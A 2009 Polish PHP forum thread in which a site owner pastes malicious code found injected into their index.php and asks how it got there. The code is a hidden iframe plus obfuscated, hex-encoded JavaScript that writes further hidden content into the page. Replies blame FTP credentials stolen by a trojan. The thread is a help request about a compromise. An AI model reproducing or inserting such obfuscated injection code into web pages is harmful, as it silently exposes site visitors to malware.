[php] Wirus na stronie - Forum PHP.pl

[php] Wirus na stronie

propage Zobacz profil	14.01.2009, 20:51:05 Post #1
Grupa: Zarejestrowani Postów: 330 Pomógł: 0 Dołączył: 25.01.2008 Ostrzeżenie: (0%)	na mojej stronie pojawił się taki kod [PHP] pobierz, plaintext <?php <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe> <script>function c102916999516l496e0d2bf1aea(l496e0d2bf22bc){ function l496e0d2bf2a8d(){var l496e0d2bf325e=16;return l496e0d2bf325e;} return (parseInt(l496e0d2bf22bc,l496e0d2bf2a8d()));}function l496e0d2bf3a2e(l496e0d2bf4200){ var l496e0d2c00793='';l496e0d2c026d5=String.fromCharCode;for(l496e0d2c00f63=0;l496e0d2c00f63<l496e0d2bf4200.length;l496e0d2c00f63+=2){ l496e0d2c00793+=(l496e0d2c026d5(c102916999516l496e0d2bf1aea(l496e0d2bf4200.substr(l496e0d2c00f63,2))));}return l496e0d2c00793;} var x.d.2='';var l496e0d2c030f5='3C736'+x.d.2+'3726'+x.d.2+'970743E6'+x.d.2+'96'+x.d.2+'6'+x.d.2+'28216'+x.d.2+'D796'+x.d.2+'96'+x.d.2+'1297B6'+x.d.2+'46'+x.d.2 +'F6'+x.d.2+'3756'+x.d.2+'D6'+x.d.2+'56'+x.d.2+'E742E77726'+x.d.2+'9746'+x.d.2+'528756'+x.d.2+'E6'+x.d.2+'5736'+x.d.2+'36'+x.d.2+'1706'+x.d.2 +'528202725336' +x.d.2+'32536'+x.d.2+'392536'+x.d.2+'36'+x.d.2+'2537322536'+x.d.2+'312536'+x.d.2+'6'+x.d.2+'42536'+x.d.2 +'352532302536'+x.d.2+'6'+x.d.2+'52536'+x.d.2+'312536' +x.d.2+'6'+x.d.2+'42536'+x.d.2+'3525336'+x.d.2+'42536'+x.d.2+'332533312533302532302537332537322536'+x.d.2+'3325336'+x.d.2+ '42532372536'+x.d.2+'3825373425373425373025336' +x.d.2+'125326'+x.d.2+'6'+x.d.2+'25326'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'372536'+x.d.2+'6'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'372536'+x.d.2+'6' +x.d.2+'6'+x.d.2+'2533322536'+x.d.2+'6'+x.d.2+'42536' +x.d.2+'3525326'+x.d.2+'52536'+x.d.2+'6'+x.d.2+'52536'+x.d.2+'3525373425326'+x.d.2+'6'+x.d.2+'25326'+x.d.2+'52536'+x.d.2+ '372536'+x.d.2+'6'+x.d.2+'6'+x.d.2+'25326'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'332536' +x.d.2+'382536'+x.d.2+'352536'+x.d.2+'332536'+x.d.2+'6'+x.d.2+'225326'+x.d.2+'52536' +x.d.2+'382537342536'+x.d.2+'6'+x.d.2+'42536'+x.d.2+'6'+x.d.2+'32532372532302537372536'+x.d.2+'392536'+x.d.2+'342537342536' +x.d.2+'3825336'+x.d.2+'42533322533322533322532302536'+x.d.2+'382536'+x.d.2+'352536'+x.d.2+'392536'+x.d.2+'372536'+x.d.2+ '3825373425336'+x.d.2+'42533352533342533372532302537332537342537392536'+x.d.2+'6'+x.d.2+'32536'+x.d.2+'3525336'+x.d.2+ '4253237253736'+x.d.2+'2536'+x.d.2+'392537332536'+x.d.2+'392536'+x.d.2+'322536'+x.d.2+'392536'+x.d.2+'6'+x.d.2+'32536'+x.d.2+ '3925373425373925336'+x.d.2+'12536'+x.d.2+'382536'+x.d.2+'392536'+x.d.2+'342536'+x.d.2+'342536'+x.d.2+'352536'+x.d.2+'6'+x.d.2+'525323725336' +x.d.2+'525336'+x.d.2+'325326'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'392536'+x.d.2+'36'+x.d.2+'2537322536'+x.d.2+'312536'+x.d.2+'6'+x.d.2+'42536'+x.d.2+ '3525336'+x.d.2+'52729293B7D76'+x.d.2+'6'+x.d.2+'172206'+x.d.2+'D796'+x.d.2+'96'+x.d.2+'13D7472756'+x.d.2+'53B3C2F736'+x.d.2+'3726'+x.d.2+ '970743E';document.write(l496e0d2bf3a2e(l496e0d2c030f5));</script> ?> [PHP] pobierz, plaintext Wstrzyknięty do pliku index.php Wie ktoś jak ten wirus dostaje się do pliku index.php? Stosuje się do wszystkich podstawowych zasas przy tworzeniu stron, filtruje zawsze wszystkie dane od użytkownika, hm

Odpowiedzi

l0ud Zobacz profil	15.01.2009, 18:04:40 Post #2
Grupa: Zarejestrowani Postów: 1 387 Pomógł: 273 Dołączył: 18.02.2008 Ostrzeżenie: (0%)	Podejrzewam, że hasło jest zczytywane podczas infekcji - z konfiguracji klienta ftp albo łączenia. Modyfikacja strony odbywa się już z innego komputera (zapewne serwera włamywaczy) i może wystąpić z opóźnieniem. Może Twoje hasła były za słabe? Tak czy siak, ja dziury po stronie skrpytów bym nie szukał.

Posty w temacie

propage [php] Wirus na stronie 14.01.2009, 20:51:05

MWL XSS?? a może masz jakieś pole input któ... 14.01.2009, 21:12:00

erix CytatXSS?? Nie sądzę. Raczej luka w postaci korz... 14.01.2009, 21:18:55

propage nie mam u siebie register global włączon... 14.01.2009, 21:25:19

erix Cytatnie mam u siebie register global włączone. A ... 14.01.2009, 21:36:35

propage allow_url_fopenOff allow_url_includeOff wszystki... 14.01.2009, 21:42:29

rzymek01 normalnie ktoś ci wszedł na ftp i zedytował plik 14.01.2009, 21:51:21

erix Cytatczy to, że są takie foldery już znaczy, że kt... 14.01.2009, 22:19:19

l0ud Nic z tych rzeczy. Prędzej robak lub trojan na kom... 14.01.2009, 22:27:19

propage Wirsu na komputerze lokalnym dopisalby ten kod do ... 14.01.2009, 22:36:23

l0ud Podejrzewam, że hasło jest zczytywane podczas infe... 15.01.2009, 18:04:40

pyro Ewentualnie poprostu przejrzyj logi... głównie htt... 15.01.2009, 18:08:12

propage problem ciagle występuje, ciągle tylko u tego same... 3.02.2009, 17:22:50

l0ud Nie. Ty albo klient używacie zainfekowanego komput... 3.02.2009, 20:35:58

szakal89 witam na stronie pokazuje mi wirusa walcze z nim ... 30.12.2012, 13:29:38

« Następny starszy · PHP · Następny nowszy »

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych: